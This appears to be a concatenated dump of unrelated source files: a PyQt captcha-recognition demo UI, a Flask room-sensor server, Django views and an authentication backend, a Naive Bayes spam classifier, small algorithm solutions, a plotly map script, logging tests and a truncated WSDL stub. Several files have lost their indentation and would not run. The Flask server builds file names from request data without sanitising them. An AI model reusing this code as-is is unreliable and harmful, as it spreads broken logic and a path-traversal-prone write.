        self.result = QtWidgets.QTextBrowser(self.centralwidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.result.sizePolicy().hasHeightForWidth())
        self.result.setSizePolicy(sizePolicy)
        self.result.setMinimumSize(QtCore.QSize(0, 100))
        font = QtGui.QFont()
        font.setFamily("微软雅黑")  # "Microsoft YaHei" font family
        font.setPointSize(14)
        font.setBold(False)
        font.setWeight(50)
        self.result.setFont(font)
        self.result.setObjectName("result")
        self.verticalLayout.addWidget(self.result)
        self.gridLayout.addLayout(self.verticalLayout, 0, 1, 1, 1)
        # Left-hand column of action buttons (one per processing step).
        self.verticalLayout_2 = QtWidgets.QVBoxLayout()
        self.verticalLayout_2.setContentsMargins(-1, -1, 20, -1)
        self.verticalLayout_2.setObjectName("verticalLayout_2")
        self.pushButton_1 = QtWidgets.QPushButton(self.centralwidget)
        self.pushButton_1.setAutoFillBackground(False)
        self.pushButton_1.setObjectName("pushButton_1")
        self.verticalLayout_2.addWidget(self.pushButton_1)
        self.pushButton_2 = QtWidgets.QPushButton(self.centralwidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.pushButton_2.sizePolicy().hasHeightForWidth())
        self.pushButton_2.setSizePolicy(sizePolicy)
        self.pushButton_2.setAutoFillBackground(False)
        self.pushButton_2.setObjectName("pushButton_2")
        self.verticalLayout_2.addWidget(self.pushButton_2)
        self.pushButton_3 = QtWidgets.QPushButton(self.centralwidget)
        self.pushButton_3.setAutoFillBackground(False)
        self.pushButton_3.setObjectName("pushButton_3")
        self.verticalLayout_2.addWidget(self.pushButton_3)
        self.pushButton_4 = QtWidgets.QPushButton(self.centralwidget)
        self.pushButton_4.setAutoFillBackground(False)
        self.pushButton_4.setObjectName("pushButton_4")
        self.verticalLayout_2.addWidget(self.pushButton_4)
        self.pushButton_5 = QtWidgets.QPushButton(self.centralwidget)
        self.pushButton_5.setAutoFillBackground(False)
        self.pushButton_5.setObjectName("pushButton_5")
        self.verticalLayout_2.addWidget(self.pushButton_5)
        self.pushButton_6 = QtWidgets.QPushButton(self.centralwidget)
        self.pushButton_6.setAutoFillBackground(False)
        self.pushButton_6.setObjectName("pushButton_6")
        self.verticalLayout_2.addWidget(self.pushButton_6)
        self.gridLayout.addLayout(self.verticalLayout_2, 0, 0, 1, 1)
        # Buttons column : picture column = 1 : 3 width ratio.
        self.gridLayout.setColumnStretch(0, 1)
        self.gridLayout.setColumnStretch(1, 3)
        MainWindow.setCentralWidget(self.centralwidget)
        self.retranslateUi(MainWindow)
        # Wire each button to the corresponding handler slot on MainWindow.
        self.pushButton_1.clicked.connect(MainWindow.browseFile)
        self.pushButton_2.clicked.connect(MainWindow.grayImage)
        self.pushButton_3.clicked.connect(MainWindow.binaryImage)
        self.pushButton_4.clicked.connect(MainWindow.denoiseImage)
        self.pushButton_5.clicked.connect(MainWindow.eroseDilateImage)
        self.pushButton_6.clicked.connect(MainWindow.cutChars)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)

    def retranslateUi(self, MainWindow):
        # Assign all user-visible strings (Chinese UI text).
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "验证码识别模拟"))  # "captcha recognition demo"
        self.label.setText(_translate("MainWindow", "                   Picture"))
        self.little1.setText(_translate("MainWindow", "little1"))
        self.little2.setText(_translate("MainWindow", "little2"))
        self.little3.setText(_translate("MainWindow", "little3"))
        self.little4.setText(_translate("MainWindow", "little4"))
        self.little5.setText(_translate("MainWindow", "little5"))
        self.pushButton_1.setText(_translate("MainWindow", "选择文件"))  # "choose file"
        self.pushButton_2.setText(_translate("MainWindow", "灰度化"))  # "grayscale"
        self.pushButton_3.setText(_translate("MainWindow", "二值化"))  # "binarize"
        self.pushButton_4.setText(_translate("MainWindow", "去噪"))  # "denoise"
        self.pushButton_5.setText(_translate("MainWindow", "腐蚀和膨胀"))  # "erosion and dilation"
        self.pushButton_6.setText(_translate("MainWindow", "分割识别"))  # "segment and recognize"
|
990,983 | c95a45b24848b7b034f8ef16b61deb2c5874ccc0 | '''
Created on Oct 28, 2016
@author: Bogdan Boboc (bogdanboboc97@gmail.com) && Florin Tamas (tamasflorin@live.com)
'''
from flask import Flask, request, jsonify
import cv2
import numpy as np
app = Flask(__name__)
rooms_hash = {}
persons_count_hash = {}
humidity_hash = {}
temperature_hash = {}
def get_number_of_persons(image_path):
    """Detect people in the image at ``image_path`` with OpenCV's default
    HOG pedestrian detector and return how many detections were found."""
    detector = cv2.HOGDescriptor()
    detector.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())
    frame = cv2.imread(image_path)
    boxes, weights = detector.detectMultiScale(frame, winStride=(8,8), padding=(32,32), scale=1.05)
    return len(boxes)
@app.route("/update_movement", methods = ["POST"])
def update_movement():
    """Handle a sensor POST: record status/humidity/temperature for the room,
    store the attached snapshot, and refresh the rolling person count.

    Expects JSON with keys: name, status, humidity, temperature, image
    (base64-encoded). Responds {"status": "ok"} on success and
    {"status": "invalid data"} on any failure.
    """
    global rooms_hash
    content = request.get_json(silent = True)
    response = {}
    try:
        rooms_hash[ content["name"] ] = content["status"]
        humidity_hash[ content["name"] ] = content["humidity"]
        temperature_hash[ content["name"] ] = content["temperature"]
        # NOTE(review): str.decode('base64') is Python 2 only — if this ever
        # runs on Python 3 it must become base64.b64decode(content["image"]).
        save_image(content["name"], str(content["image"]).decode('base64'))
        result = get_number_of_persons(content["name"] + ".jpeg")
        update_persons_count(content["name"], result)
        response = { "status" : "ok" }
    except Exception:
        # FIX: was a bare ``except:``, which also swallows SystemExit and
        # KeyboardInterrupt; keep the deliberate best-effort response.
        response = { "status" : "invalid data" }
    return jsonify(response)
def update_persons_count(room, count):
    """Append ``count`` to the room's rolling window of person counts,
    keeping at most the six most recent samples."""
    global persons_count_hash
    window = persons_count_hash.setdefault(room, [])
    if len(window) >= 6:
        del window[0]  # drop the oldest sample
    window.append(count)
@app.route("/get_movement", methods = ["GET"])
def get_movement():
    """Return all room states as one semicolon-delimited CSV string."""
    global rooms_hash
    return get_rooms_CSV()
@app.route("/get_movement_json", methods = ["GET"])
def get_movement_json():
    """Return all room states as a JSON array."""
    global rooms_hash
    return get_rooms_JSON()
@app.route("/get_room_status", methods = ["GET", "POST"])
def get_room_status():
    """Return status/count/humidity/temperature for the room named in the
    ``name`` query parameter, or an error status when the request is
    malformed or the room is unknown."""
    global rooms_hash
    try:
        room_name = request.args.get("name")
        if room_name in rooms_hash.keys():
            return jsonify( { "status" : "" + rooms_hash[ room_name ] , "count" : get_persons_count(room_name), "humidity" : humidity_hash[room_name], "temperature" : temperature_hash[room_name] } )
    except Exception:
        # FIX: was a bare ``except:``, which also swallows SystemExit and
        # KeyboardInterrupt; the best-effort error response is kept.
        return jsonify( { "status" : "Bad format!" })
    return jsonify( { "status" : "Room inexistent!"} )
def get_rooms_JSON():
    """Build a JSON array describing every known room."""
    global rooms_hash
    payload = [
        {
            "name": room,
            "status": rooms_hash[room],
            "count": get_persons_count(room),
            "humidity": humidity_hash[room],
            "temperature": temperature_hash[room],
        }
        for room in rooms_hash
    ]
    return jsonify(payload)
def get_persons_count(room_name):
    """Return the room's smoothed person count as a string: the rolling
    window total divided by six and rounded (the window holds at most six
    samples)."""
    global persons_count_hash
    # Builtin sum() replaces the original accumulator loop (which shadowed
    # the ``sum`` builtin); the expression semantics are unchanged.
    window_total = sum(persons_count_hash[room_name])
    return str(int(round(window_total / 6)))
def get_rooms_CSV():
    """Serialise every room as a "name,status,count,humidity,temperature;"
    record; all records are concatenated into a single string."""
    global rooms_hash
    records = []
    for room in rooms_hash:
        fields = [room,
                  rooms_hash[room],
                  get_persons_count(room),
                  humidity_hash[room],
                  temperature_hash[room]]
        records.append(",".join(fields) + ";")
    return "".join(records)
def save_image(room_name, str_image):
    """Write decoded image bytes to "<room_name>.jpeg".

    :param room_name: room identifier, used as the output file stem.
    :param str_image: raw image bytes to write.
    """
    photo_file_name = room_name + ".jpeg"
    # FIX: use a context manager so the handle is closed even when write()
    # raises (the original leaked the handle on error and shadowed the
    # ``file`` builtin).
    with open(photo_file_name, "wb") as out:
        out.write(str_image)
if __name__ == "__main__":
app.run(host='0.0.0.0',threaded=True)
|
990,984 | ada9f195c9c727cb37c59ab355c608621256ad73 | from rest_framework.viewsets import ModelViewSet
from rest_framework.generics import ListAPIView
from goods.models import SpecificationOption, SPUSpecification
from meiduo_admin.serializers.option import OptionSerializer, OptionSpecificationSerializer
from meiduo_admin.utils import PageNum
class OptionModelViewSet(ModelViewSet):
    """CRUD endpoints for specification options.

    Serves all SpecificationOption rows through OptionSerializer, paginated
    with the project-wide PageNum pagination class.
    """
    serializer_class = OptionSerializer
    queryset = SpecificationOption.objects.all()
    pagination_class = PageNum
class OptionListAPIView(ListAPIView):
    """Read-only list of all SPU specifications, unpaginated.

    Serialized with OptionSpecificationSerializer — presumably nests each
    specification's options; confirm against the serializer definition.
    """
    serializer_class = OptionSpecificationSerializer
    queryset = SPUSpecification.objects.all()
|
990,985 | de292693bdda103f60160877967d1ee62e2043a0 | # -*- coding: utf-8 -*-
"""
Created on Sat May 26 18:19:58 2018
@author: Harini Gowdagere Tulasidas
PSU ID: 950961342
@Course : CS 545- Machine Learning
Programming Assignment2: Gaussian Naïve Bayes and Logistic Regression to classify
the Spambase data from the UCI ML repository
"""
from __future__ import division
import numpy as np
import pandas as pd
from sklearn.metrics import confusion_matrix as cm
from sklearn.metrics import recall_score as recall
from sklearn.metrics import accuracy_score
from sklearn.metrics import precision_score
""" This method splits the dataset such that the test and train data has 2300 instances each
the there are 40% spam and 60% no spam instances."""
def test_train_split():
filename = "/Users/harinirahul/Desktop/CS - 545 - ML/PA2/spambase/spambase.data"
dataset = np.array(pd.read_csv(filename))
temp = np.split(dataset, np.where(np.diff(dataset[:,-1]))[0]+1)
spam = temp[0]
no_spam = temp[1]
np.random.shuffle(spam)
np.random.shuffle(no_spam)
spam_size = int((len(spam)/2))
no_spam_size = int((len(no_spam)/2))
train_data = np.concatenate((spam[: spam_size, :],no_spam[:no_spam_size,:]), axis =0)
test_data = np.concatenate((spam[spam_size: , :],no_spam[no_spam_size:,:]), axis =0)
train_labels = train_data[:,-1]
train_labels = train_labels.reshape((len(train_labels),1))
test_labels = test_data[:,-1]
test_labels = test_labels.reshape((len(test_labels),1))
return train_data,train_labels,test_data,test_labels
"""This is a utility method that computes mean and standard deviation for the features.
It also replaces the Standard deviation with minimum value of 0.0001 when it is 0. This is done
to avoid the errors while computing the log """
def mean_and_sd(data):
    """Return the column-wise mean and standard deviation as column vectors.

    Zero standard deviations are clamped to 0.0001 so later log/division
    operations stay finite."""
    col_mean = np.mean(data, axis=0)
    col_std = np.std(data, axis=0)
    col_std = np.where(col_std == 0.0, 0.0001, col_std)
    return col_mean.reshape((-1, 1)), col_std.reshape((-1, 1))
"""
This method is used to calculate the prior probabilities for both the spam and Non spam classes.
"""
def calculate_probabilities(dataset):
    """Compute the class log-priors and per-class feature statistics.

    Rows with label 1 (last column) are spam; everything else is non-spam.
    Only the first 57 columns are treated as features."""
    spam_rows = []
    no_spam_rows = []
    for row in dataset:
        if row[-1] == 1:
            spam_rows.append(row)
        else:
            no_spam_rows.append(row)
    spam_prior = float(len(spam_rows) / len(dataset))
    no_spam_prior = float(len(no_spam_rows) / len(dataset))
    print("prior Probability of the spam class: " ,spam_prior , "\n Prior probability of Non Spam class :", no_spam_prior)
    spam_arr = np.array(spam_rows)
    no_spam_arr = np.array(no_spam_rows)
    spam_x_mean, spam_x_std = mean_and_sd(spam_arr[:, :57])
    no_spam_x_mean, no_spam_x_std = mean_and_sd(no_spam_arr[:, :57])
    return np.log(spam_prior), np.log(no_spam_prior), spam_x_mean, spam_x_std, no_spam_x_mean, no_spam_x_std
""" This method is used to compute the probabilities for the Gaussian Naive Bayes algorithm
and classifies the instance as spam and non spam """
def gaussian_naive_bayes_classifier(log_spam_prior, log_no_spam_prior, spam_x_mean, spam_x_std, no_spam_x_mean, no_spam_x_std, row):
    """Classify one feature column vector with Gaussian Naive Bayes.

    Returns 1 (spam) when the spam posterior score wins, otherwise 0."""
    def _log_likelihood(mean, std):
        # Per-feature Gaussian density, floored at 0.0001 to keep log finite.
        density = (1 / (np.sqrt(2 * np.pi) * std)) * np.exp(-((row - mean) ** 2) / (2 * std ** 2))
        density[density == 0.0] = 0.0001
        return np.sum(np.log(density))

    spam_score = _log_likelihood(spam_x_mean, spam_x_std) + log_spam_prior
    no_spam_score = _log_likelihood(no_spam_x_mean, no_spam_x_std) + log_no_spam_prior
    return np.argmax([no_spam_score, spam_score])
"""This method has the final predictions of the Gaussian Naive Bayes Classifier for the dataset. """
def predict(train_data, test_data):
    """Train on train_data and return a list of 0/1 predictions for test_data.

    Each test row is reshaped into a column vector because the classifier
    works on (features, 1) arrays.
    """
    params = calculate_probabilities(train_data)
    predictions = []
    for sample in test_data:
        column = sample.reshape((len(sample), 1))
        predictions.append(gaussian_naive_bayes_classifier(*params, column))
    return predictions
"""The main method obtains the classifier's predictions and computes metrics
such as recall, accuracy and precision, and also builds the confusion matrix. """
def main():
    """Evaluate the Gaussian NB classifier on the held-out split and print metrics."""
    train_data, train_labels, test_data, test_labels = test_train_split()
    # Only the first 57 columns are features; the rest carry the label.
    predicted_output = predict(train_data, test_data[:, :57])
    print("confusion matrix : \n", cm(test_labels, predicted_output))
    print("Recall : ", recall(test_labels, predicted_output))
    print("Accuracy:", accuracy_score(test_labels, predicted_output) * 100, "%")
    print("precision : ", precision_score(test_labels, predicted_output))


if __name__ == "__main__":
    main()
|
990,986 | 36a408da5446c5ce29160f8b3e71c26eb622f03a | #!python3
# -*- coding: utf-8 -*-
"""
@Author: Anscor
@Date: 2020-04-06 10:15:47
@LastEditors: Anscor
@LastEditTime: 2020-04-06 10:15:48
@Description: 验证类
"""
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth.models import User
from django.db.models import Q
from rest_framework import exceptions
class UserModelBackend(ModelBackend):
    """Authentication backend that accepts username, student number, email or phone.

    Lookup priority when several identifiers are supplied:
    username > student_number > email > phone.
    """

    def authenticate(self, request, username=None, password=None, **kwargs):
        email = kwargs.get("email", None)
        phone = kwargs.get("phone", None)
        student_number = kwargs.get("student_number", None)
        # Require a password and at least one identifier; otherwise let other
        # backends try (return None).
        if not password or not (username or email or phone or student_number):
            return None
        users = User.objects.select_related("profile").all()
        # NOTE(review): filtering User directly on student_number/phone assumes a
        # custom user model carries those fields; if they live on the related
        # profile this should be profile__student_number / profile__phone — confirm.
        user = None
        for field, value in (
            ("username", username),
            ("student_number", student_number),
            ("email", email),
            ("phone", phone),
        ):
            if value:
                user = users.filter(**{field: value}).first()
                break
        if not user:
            raise exceptions.AuthenticationFailed("未找到对应的用户!")
        if user.check_password(password):
            return user
        raise exceptions.AuthenticationFailed("认证失败!")
|
990,987 | f7372b7f99575296343100180cdd3424d04ea69f | class Solution:
def productExceptSelf(self, nums):
prefixProduct = 1
responseArr = []
for n in nums:
responseArr.append(prefixProduct)
prefixProduct *= n
suffixProduct = 1
for i in range(len(nums)-1, -1, -1):
responseArr[i] *= suffixProduct
suffixProduct *= nums[i]
return responseArr
# Demo: print the answers for the two LeetCode sample inputs.
solver = Solution()
for sample in ([1, 2, 3, 4], [-1, 1, 0, -3, 3]):
    print(solver.productExceptSelf(sample))
|
990,988 | 2b8b568c5d132b22487d850ab9b39b5e0443f4bb | ins = input()
# Drop leading/trailing zeros, then report whether the remainder is a palindrome.
ins = ins.strip("0")
print("YES" if ins == ins[::-1] else "NO")
990,989 | 2fcabb86a182027dbae88144bb28d3141d7b771e | import re
from string import digits
from Sastrawi.StopWordRemover.StopWordRemoverFactory import StopWordRemoverFactory
def process(txtString):
    """Normalize Indonesian text: strip digits and punctuation, lowercase,
    and remove stopwords via Sastrawi.

    Returns the cleaned string.
    """
    remover = StopWordRemoverFactory().create_stop_word_remover()
    # Remove every digit in one translation pass.
    no_digits = txtString.translate(str.maketrans('', '', digits))
    # Collapse any non-alphanumeric run into a single space, then lowercase.
    cleaned = re.sub('[^A-Za-z0-9]+', ' ', no_digits).lower()
    return remover.remove(cleaned)
990,990 | be316f6f289978c88cca39ecc081687689514513 | # -*- coding: utf-8 -*-
"""
Created on Mon Feb 3 13:45:08 2020
@author: lucas
"""
from urllib.request import urlopen
import json
import plotly.express as px
import pandas as pd
import numpy as np
# Load 2014 county population data; FIPS codes must stay strings so leading
# zeros are preserved for the geojson join.
data2 = pd.read_csv('../../../Data/countyPop2014_v3.csv',',',dtype = {'county': 'str'})
# select data syntax data1.loc[data1['county'] == 36061]
# Build the frame plotly expects: one 'fips' column and one value column.
dfTest = pd.DataFrame()
dfTest['fips'] = data2['county']
dfTest['Population'] = data2['population']
# County boundary polygons keyed by FIPS code.
with open('../../../Data/geojson-counties-fips.json') as json_file:
    counties = json.load(json_file)
# NOTE(review): cNo and test are computed but never used below — likely
# leftovers from an earlier experiment; confirm before removing.
cNo = len(counties["features"])
test = np.ones((cNo))
#print(df)
# Choropleth of population per county, centered on the continental US.
# NOTE(review): the 'unemp' label is a leftover from the plotly unemployment
# example and does not match the Population data being plotted.
fig = px.choropleth_mapbox(dfTest, geojson=counties, locations='fips', color='Population',
                           color_continuous_scale="Viridis",
                           mapbox_style="carto-positron",range_color=(0, 1000000),
                           zoom=3, center = {"lat": 37.0902, "lon": -95.7129},
                           opacity=0.5,
                           labels={'unemp':'unemployment rate'}
                          )
# Remove the default margins so the map fills the figure.
fig.update_layout(margin={"r":0,"t":0,"l":0,"b":0})
fig.show()
990,991 | 9315787c8174999e8fefd970d7fd806244692785 | import unittest
from logutils import LogUtils
import os
import json
import time
logconfig = """
{
"loglevel" : "DEBUG",
"format" : "[%(asctime)s] %(message)s: %(levelname)s",
"dateFormat" : "%m/%d/%Y %I:%M:%S %p"
}
"""
class TestLogUtils(unittest.TestCase):
    """Integration tests: LogUtils must write formatted records to per-logger files.

    Note: the generated *.log files are intentionally left on disk (the
    cleanup calls were disabled), so reruns append to existing files.
    """

    def setUp(self):
        pass

    def tearDown(self):
        print('Tearing down')

    def test_logwrite_config(self):
        # With the custom format, the level name comes AFTER the message.
        logger = LogUtils("testlogger_cnf", json.loads(logconfig)).get_logger()
        logger.error("Test log message")
        with open('testlogger_cnf.log', 'r') as logfile:
            logstr = logfile.read()
        self.assertIn('Test log message', logstr)
        self.assertIn('ERROR', logstr)
        self.assertGreater(logstr.find('ERROR'), logstr.find('Test log message'))

    def test_logwrite_befault(self):
        # Default format puts the level name BEFORE the message.
        logger = LogUtils("testlogger_def").get_logger()
        logger.warning("Test log message")
        with open('testlogger_def.log', 'r') as logfile:
            logstr = logfile.read()
        self.assertIn('Test log message', logstr)
        self.assertIn('WARNING', logstr)
        self.assertLess(logstr.find('WARNING'), logstr.find('Test log message'))


if __name__ == '__main__':
    unittest.main()
|
990,992 | 12c3665c80f4e18a6cba25f38964a2308800a86c | #! /usr/bin/env python3
import requests
import sys
import os
# Collect every .jpeg under srcDir (recursively) and POST each one to the
# upload endpoint.
listOfFiles = []
srcDir = "/home/student-01-c4b067d66a1f/supplier-data/images/"
url = "http://localhost/upload/"
for dirpath, dirnames, filenames in os.walk(srcDir):
    for file in filenames:
        if file.endswith(".jpeg"):
            print(file)
            # BUG FIX: os.walk recurses into subdirectories, so the path must
            # be joined with the directory the file was actually found in —
            # the old srcDir + filename broke for anything below the top level.
            listOfFiles.append(os.path.join(dirpath, file))
for upload in listOfFiles:
    with open(upload, 'rb') as opened:
        r = requests.post(url, files={'file': opened})
|
990,993 | d70c2c1ca161ba82a3e7d2a9ce2abbdfdd0e191a | ##################################################
# WaterOneFlow_services_server.py
# Generated by ZSI.generate.wsdl2dispatch.ServiceModuleWriter
#
##################################################
from WaterOneFlow_services import *
from ZSI.fault import Fault, ZSIFaultDetail
from ZSI.ServiceContainer import ServiceSOAPBinding
class WaterOneFlow(ServiceSOAPBinding):
soapAction = {}
root = {}
_wsdl = """<?xml version=\"1.0\" ?>
<wsdl:definitions targetNamespace=\"http://www.cuahsi.org/his/1.0/ws/\" xmlns:http=\"http://schemas.xmlsoap.org/wsdl/http/\" xmlns:mime=\"http://schemas.xmlsoap.org/wsdl/mime/\" xmlns:s=\"http://www.w3.org/2001/XMLSchema\" xmlns:s1=\"http://www.cuahsi.org/waterML/1.0/\" xmlns:soap=\"http://schemas.xmlsoap.org/wsdl/soap/\" xmlns:soap12=\"http://schemas.xmlsoap.org/wsdl/soap12/\" xmlns:soapenc=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:tm=\"http://microsoft.com/wsdl/mime/textMatching/\" xmlns:tns=\"http://www.cuahsi.org/his/1.0/ws/\" xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\"><div><strong>Developmental service. This service is internal CUAHSI use, and evaluation.</strong></div></wsdl:documentation>
<wsdl:types>
<s:schema elementFormDefault=\"qualified\" targetNamespace=\"http://www.cuahsi.org/his/1.0/ws/\">
<s:import namespace=\"http://www.cuahsi.org/waterML/1.0/\"/>
<s:element name=\"GetSitesXml\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"site\" type=\"tns:ArrayOfString\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"authToken\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:complexType name=\"ArrayOfString\">
<s:sequence>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"string\" nillable=\"true\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
<s:element name=\"GetSitesXmlResponse\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"GetSitesXmlResult\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetSiteInfo\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"site\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"authToken\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetSiteInfoResponse\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"GetSiteInfoResult\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetVariableInfo\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variable\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"authToken\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetVariableInfoResponse\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"GetVariableInfoResult\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetSites\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"site\" type=\"tns:ArrayOfString\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"authToken\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetSitesResponse\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" ref=\"s1:sitesResponse\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetSiteInfoObject\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"site\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"authToken\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetSiteInfoObjectResponse\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" ref=\"s1:sitesResponse\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetVariableInfoObject\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variable\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"authToken\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetVariableInfoObjectResponse\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" ref=\"s1:variablesResponse\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetValues\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"location\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variable\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"startDate\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"endDate\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"authToken\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetValuesResponse\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"GetValuesResult\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetValuesObject\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"location\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variable\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"startDate\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"endDate\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"authToken\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetValuesObjectResponse\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" ref=\"s1:timeSeriesResponse\"/>
</s:sequence>
</s:complexType>
</s:element>
</s:schema>
<s:schema elementFormDefault=\"qualified\" targetNamespace=\"http://www.cuahsi.org/waterML/1.0/\">
<s:element name=\"sitesResponse\" type=\"s1:SiteInfoResponseType\"/>
<s:complexType name=\"SiteInfoResponseType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"queryInfo\" type=\"s1:QueryInfoType\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"site\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"siteInfo\" type=\"s1:SiteInfoType\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"seriesCatalog\" type=\"s1:seriesCatalogType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"extension\"/>
</s:sequence>
</s:complexType>
</s:element>
</s:sequence>
</s:complexType>
<s:complexType name=\"QueryInfoType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"creationTime\" type=\"s:dateTime\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"queryURL\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"querySQL\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"criteria\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"locationParam\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variableParam\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"timeParam\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"beginDateTime\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"endDateTime\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
</s:sequence>
</s:complexType>
</s:element>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"note\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"type\" type=\"s:string\"/>
<s:attribute name=\"href\" type=\"s:string\"/>
<s:attribute name=\"title\" type=\"s:string\"/>
<s:attribute name=\"show\" type=\"s:string\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"extension\"/>
</s:sequence>
</s:complexType>
<s:complexType name=\"SiteInfoType\">
<s:complexContent mixed=\"false\">
<s:extension base=\"s1:SourceInfoType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"siteName\" type=\"s:string\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"siteCode\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"defaultId\" type=\"s:boolean\"/>
<s:attribute name=\"network\" type=\"s:normalizedString\"/>
<s:attribute name=\"siteID\" type=\"s:normalizedString\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"timeZoneInfo\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"defaultTimeZone\" nillable=\"true\">
<s:complexType>
